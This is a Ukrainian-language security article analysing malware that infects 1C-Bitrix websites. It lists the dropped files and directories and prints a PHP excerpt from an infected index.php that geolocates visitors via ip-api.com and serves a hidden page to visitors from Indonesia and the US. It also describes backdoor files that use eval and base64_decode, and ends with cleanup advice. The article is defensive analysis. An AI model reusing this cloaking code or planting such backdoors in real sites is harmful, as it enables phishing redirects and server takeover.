1 хв.
На початку лютого 2025 року в мережі поширився вірус, який вражає сайти на платформі 1С-Бітрікс. Це шкідливе ПЗ вбудовується у файли проекту, створює додаткові директорії та виконує підозрілі дії, включаючи збирання інформації про користувачів та редиректи на зовнішні ресурси. Однак ознаки його активності вказують на модифікацію існуючих атакуючих методик, а не на зовсім новий вид загрози.Основні ознаки зараження
Створення нових файлів та директорій:
- У папці `/aspro_regions/robots/` з'являються невідомі файли.
- У корені сайту додаються файли `robots.connections.php`, `wp-ver.php`, `index.php`.
- З'являються каталоги з випадковими іменами, наприклад `1a869/`, `a410f/`, що містять підмінені `index.php`.
Зміна головного
- У файл вбудовується шкідливий код перед підключенням `header.php`.
- Код використовує обфускацію (base64_encode, goto), що ускладнює його виявлення.
Розбір заражених файлів
1. `index.php`
Файл містить прихований код, який виконує такі дії:- Отримує IP-адресу користувача.
- Робить запит до сервісу ip-api.com, щоб визначити країну.
- Якщо користувач з Індонезії або США , підключає файл `readme.html`, який може містити фішингову сторінку або редирект.
Приклад шкідливого коду:
php
$ip = getUserIP();
$api_url = " http://ip-api.com/json/{$ip}" ;
$response = file_get_contents($api_url);
$ data = json_decode ($ response, true);
if ($data["countryCode"] === "ID" || $data["countryCode"] === "US") {
ob_start();
include "readme.html";
$output = ob_get_clean();
echo $output;
die;
}
`
2. `wp-ver.php`
Цей файл маскується під систему WordPress (`wp-` у назві), але насправді виконує:- Створення прихованих backdoor-скриптів.
- Запуск віддалених команд через `eval()` або `base64_decode()`.
- Підключення до зовнішніх серверів передачі даних.
3. `robots.connections.php`
- Цей файл керує зв'язком із зовнішніми серверами.- Може використовуватись для завантаження нових шкідливих скриптів.
- Найчастіше містить зашифрований чи обфусцированний код.
Ціль вірусу
- **Перехоплення трафіку** (редиректи на фішингові сайти).- **Крадіжка даних користувачів** (IP, браузер, геолокація).
- **Використання сервера для атак** (спам, DDoS, розміщення фішингових сторінок).
Як захиститись?
1. Перевірити файли та директорії
- Видалити `robots.connections.php`, `wp-ver.php`, невідомі `index.php`.- Перевірити кореневий `index.php` на наявність шкідливого коду.
2. Оновити CMS та модулі
- Переконайтеся, що ви використовуєте актуальну версію Бітрікс.3. Обмежити доступ до сервера
- Заборонити виконання `eval()` у PHP-конфігурації.- Налаштувати `.htaccess` для захисту від завантаження файлів, що виконуються.